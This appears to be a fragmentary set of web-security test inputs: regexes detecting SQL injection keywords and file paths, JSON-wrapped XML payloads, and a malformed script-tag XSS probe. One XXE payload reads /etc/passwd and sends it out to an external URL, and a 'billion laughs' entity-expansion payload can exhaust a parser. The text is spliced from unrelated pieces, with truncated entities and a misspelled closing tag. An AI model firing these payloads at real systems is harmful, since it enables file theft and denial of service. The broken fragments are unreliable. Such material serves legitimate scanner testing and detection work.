\b(?:SELECT|INSERT|UPDATE|DELETE|DROP|UNION|ALTER|EXEC(?:UTE)?|sp_executesql)\b
\b(?:EXEC(?:UTE)?|sp_executesql)\s*\([^)]*\+\s*[^)]*\)
\b(?:SELECT|INSERT|UPDATE|DELETE|DROP|UNION|ALTER|EXEC(?:UTE)?|sp_executesql)\b|\b(?:EXEC(?:UTE)?|sp_executesql)\s*\([^)]*\+\s*[^)]*\)




{
  "xml": "<?xml version=\"1.0\"?>\n<!DOCTYPE foo [\n<!ELEMENT foo (#ANY)>\n<!ENTITY % xxe SYSTEM \"file:///etc/passwd\">\n<!ENTITY blind SYSTEM \"https://www.example.com/?%xxe;\">]><foo>&blind;</foo>"
}

"scaer"><!ENTITY xeecodoi1 "&xeecodoi0;&xeecodoi0;"><!ENTITY xeecodoi2 "&xeecodoi1;&xeecodoi1;"><!ENTITY xeecodoi3 "&xeecodoi2;&xeecodoi2;">]>
{
  "xml": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\n<!DOCTYPE root [\n  <!ENTITY lol \"lol\">\n  <!ENTITY lol2 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">\n  <!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol
============


{
  "xml": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\n<!DOCTYPE root [\n  <!ENTITY lol \"lol\">\n  <!ENTITY lol2 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">\n  <!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\">\n  <!ENTITY lol4 \"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;\">\n  <!ENTITY lol5 \"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;\">\n  <!ENTITY lol6 \"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;\">\n  <!ENTITY lol7 \"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;\">\n  <!ENTITY lol8 \"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;\">\n  <!ENTITY lol9 \"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;\">\n]>\n<contact>\n    <name>&lol9;</name>\n    <lastName>test</lastName>\n</contact>"
}


<script src=\alert(1)\"></scrtipt>



\b(?:[A-Za-z]:\\|/)(?:[^<>:"/\\|?*]+\\)*[^<>:"/\\|?*]+
